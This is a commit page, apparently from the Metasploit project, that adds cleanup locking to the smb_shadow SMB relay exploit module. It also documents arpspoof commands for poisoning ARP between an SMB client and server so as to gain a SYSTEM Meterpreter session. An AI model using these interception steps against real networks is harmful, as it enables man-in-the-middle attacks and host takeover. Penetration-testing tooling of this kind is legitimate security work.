Add mutex to cleanup in smb_shadow

The mutex will prevent multiple calls to cleanup when the module is stopped with Ctrl-C. Add a Notes section to the documentation which describes arpspoof usage and such.
rapid7 · Jan 7, 2022 · 3051c5d · 3051c5d
1 parent cf6ab21
commit 3051c5d
Show file tree

Hide file tree

Showing 2 changed files with 25 additions and 6 deletions.
diff --git a/documentation/modules/exploit/windows/smb/smb_shadow.md b/documentation/modules/exploit/windows/smb/smb_shadow.md
@@ -54,3 +54,15 @@ Follow the following steps to target all the hosts on the LAN:
 6. Do `run`
 7. Wait for any SMB Client to connect to any SMB Server as an Administrator
 8. Receive a Meterpreter Session as SYSTEM on the SMB Server host
+
+## Notes
+
+This module has a tendency to spawn multiple sessions due to the SMB Client retrying the connection.
+
+This module will not finish execution by itself and should be terminated with Ctrl-C.
+
+Follow the following steps to use arpspoof instead of bettercap on Linux:
+
+1. Enable ipv4 forwarding (`sysctl -w net.ipv4.ip_forward=1`)
+2. Start arpspoof targeting the SMB Client (`arpspoof -i <iface> -t <smb-client-ip> <smb-server-ip>`)
+3. Start arpspoof targeting the SMB Server (`arpspoof -i <iface> -t <smb-server-ip> <smb-client-ip>`)
diff --git a/modules/exploits/windows/smb/smb_shadow.rb b/modules/exploits/windows/smb/smb_shadow.rb
@@ -85,6 +85,8 @@ def exploit
     print_error('WARNING : Not running as Root. This can cause socket permission issues.') unless Process.uid == 0
     @sessions = {}
     @mutex = Mutex.new
+    @cleanup_mutex = Mutex.new
+    @cleanedup = false
     @main_threads = []
     @interface = datastore['INTERFACE'] # || Pcap.lookupdev
     unless Socket.getifaddrs.map(&:name).include? @interface
@@ -712,11 +714,16 @@ def int2ip(int)
 
   # This cleans up and exits all the active threads.
   def cleanup
-    print_status 'Cleaning Up...'
-    @syn_capture_thread.exit if @syn_capture_thread
-    @ack_capture_thread.exit if @ack_capture_thread
-    @main_threads.map(&:exit) if @main_threads
-    reset_p445_fwrd
-    print_status 'Cleaned Up.'
+    @cleanup_mutex.synchronize do
+      unless @cleanedup
+        print_status 'Cleaning Up...'
+        @syn_capture_thread.exit if @syn_capture_thread
+        @ack_capture_thread.exit if @ack_capture_thread
+        @main_threads.map(&:exit) if @main_threads
+        reset_p445_fwrd
+        @cleanedup = true
+        print_status 'Cleaned Up.'
+      end
+    end
   end
 end